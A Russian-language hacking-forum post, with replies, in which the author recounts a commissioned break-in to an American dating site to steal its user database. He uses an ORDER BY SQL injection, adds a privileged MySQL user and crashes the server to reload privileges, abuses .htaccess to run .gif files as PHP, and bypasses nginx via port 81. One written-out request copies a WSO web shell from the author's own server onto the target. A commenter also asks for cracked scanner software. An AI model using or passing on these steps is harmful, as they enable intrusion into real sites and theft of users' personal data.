INTRO

Доброго времени суток!

По немногочисленным просьбам решил написать ешё 1 статью/роман_хакреа/рассказ. Причина этому - накопившиеся в голове проблеммы и их решения, с которыми может столкнутся каждый.

Сразу предупреждаю, что ничего критически нового тут нету, и если вы гуру, то вы врядли найдете сдесь что-то новое. Т.К. эта статья написана для таких же как и я сам. Для тех, кто учится.

БЛАГОДАРНОСТИ

BigBear - за все

Га-Ноцри - дедик

НАХТАЧЕК - хинты

nikp - финт ушами с мускулом

Пожалуй, погнали!

СКУЛЬ

Жертвой был какой-то американский дейтинг. Заказ - как обычно - бд с юзаками.

Все как обычно, кинул в акунетикс, и сам пошел искать ручками. В этот раз я опередил софт, и нашел что-то странное. Как оказалось позднее, скуль была в ордере. Как юнионовская она не крутилась, хавидж начал крутить как time based (что не удивительно, т.к. у него на меня вообще аллергия ), и крутить пришлось ручками.

Вывод ошибки был, ну и понятно я попытался раскрутить как error based. Вышло вот что:

Удивляло больше всего меня то, что конструкция and 1=1 помогала только при использование ДВАЖДЫ! Почему я так и не выяснил...

Мне повезло, у моего юзера была возможность читать mysql.user, но file_priv был N. Спустя пару запросов, я извлек юзера с кривыми правами (чтение\запись по всей бд) и host=%

Ближайший wso -> SQL -> connect -> УРА! Я внутри.

Писать файлы я не мог, но мог редактировать mysql.user, что доставляло не мение. Я создал себе юзера, примитивным insert, с доступом откуда угодно, и полными правами. Но тут был облом... Зайти под ним я не мог, для этого требоволось применить изменения в силу. На команду

прав не было, а сервер не перезагружался месяцами. И тут появился товарищь nikp и сказал:

!ПОЛЕЗНЯШКА НОМЕР РАС!

Мускул упал, и через 2 минуты самостоятельно ребутнулся. Ещё через 5-7 секунд у меня были рут права

ШЕЛЛ

Наверное больше всего гемора доставила заливка шелла.

Писать я мог, но незнал куда. Почитав ЭТО в пару запросов я извлек конфиг апача, ну а из него и путь. Но дало мне это не много, так как папка с правами 777 была одна, и в ней нельзя было запускать ничего как php.

Ясное дело, после минуты раздумий я решил написать свой .htaccess (с блэк-джэком и шлюхами) в котором банально запускал бы .gif как php.

Сказано - сделано, но опять облом. Обычный перенос строки превращался в "/".

!ПОЛЕЗНЯШКА НОМЕР ДВАС!

Записал в него я следубщее:

Так, .htaccess записан, но не работает. Тупо игнорируется. Я перепробывал все варианты, подпапки с правами записи заканчивались, а мускулом файлы удалять нельзя, что делать я не знал...

После пачки мальборо и 3 чашек какого-то кофе, какого не в курсе, мама принесла , я забил на это дело и решил как тру-гуру юзать низкоуровневые атаки на порт. Открыл nmap, воткнул IP, просканил... и... фак май моск!!!

Понятное дело нгиникс плевал на мои .htaccess, т.к. эта фича чисто апачевская. Любимая опера понятно обращалась по 80 порту, и ответ мне выдавал нгиникс. Я попробывал следующее:

!ПОЛЕЗНЯШКА НОМЕР ТРИС!

target.com:81

Сайт загрузился отлично.

target.com:81/uploads/1/asd.gif

И о чудо, вывелось ранее записаное мной в эту "картинку" echo. И phpinfo() тоже кстате вывелось

target.com:81/wtf2.gif?a=copy("http://www.myserser.com/wso.txt","/home/target/public_html/uploads/1/wso.gif");

Вобщем, все сработало. Я зашел в шелл.

ШЕЛЛ

Первым делом я глянул на ядро

2010 год, вроде нормально. Бинд порт не сработал, тогда я отжал дедик, и зацепился бэк-коннектом. Но увы... Уже 10 сплоитов не помогли... Стоит там openSUSE 11.3 которя не хочет рутатся, не в какую... увы...

Так что, если есть какие идеи по руту - мое пм открыто

Подробнее о проблемме тут

Вот собственно и все. Оранжевым выделенны моменты, которые стоит запомнить, или записать.

Всем спасибо, критика уместна.

Pirotexnik

что это???

Про добавления юзверя интересно, не когда не задумывался, мб потомучто не занимаюсь этим.

Это metasploit и подобное.

Добавление юзера тупо руками. Insert.

ОФФТОПИК сорри

Можно ссылку на крякнутый акунетикс. Заранее благодарен.

Tigger, от дорка до рута - потому что продолжение, ну рут получить я собираюсь

Сплоитов перепробовал уйму.

А нащет портов - так дело не дошло просто

Pirotexnik взорвал мой мозг)

Ближайший wso -> SQL -> connect -> УРА! Я внутри.

а это обязательно ближайшего соседа надо выбрать или на прямую тоже можно ? )

Фиксер, я имелл ввиду любой шелл взял Ближайший, что был под рукой, а не к хосту ближайщий.

Статья не идеальна. Но очень хорошая. Автору респект.

Например, запрос на крэш мускуля я не знал. Да и про связку backend тоже.

От разных там гуру слышать вопросы, мол, там "низкоуровневое ... что такое". Смешно. Ладно бы новички спрашивали и им не понятно было. В общем ТС не воспринимай сильно близко критику.

Нет, разные гуру как-раз меня этому и научили. Просто подавляющее большинство используют то, что для нас ново и интересно как бытовую обыденность. Поэтому для того-же shell_c0de эта статья то же самое, что для нас утром проснутся Но действительно знающие люди забывают, что тоже когда-то этого не знали. Отсюда и недопонимания. Кто-то напишет "Спасибо много нового", потому, что ещё не разу не рутал, кто-то напишет "Ну и что тут нового? Это стандартные действия... ТС - лох!", потому, что за спиной 5-10 лет хека...

Впринципе, я и сам злюсь, когда ко мне приходят сообщения типа "Как взломать сайт", хотя год назад я сам такое писал С опытом начинаешь считать приметивной обыденостью то, что узнал недавно.

p.s. за синтаксис извиняйте, пойду я спать кароче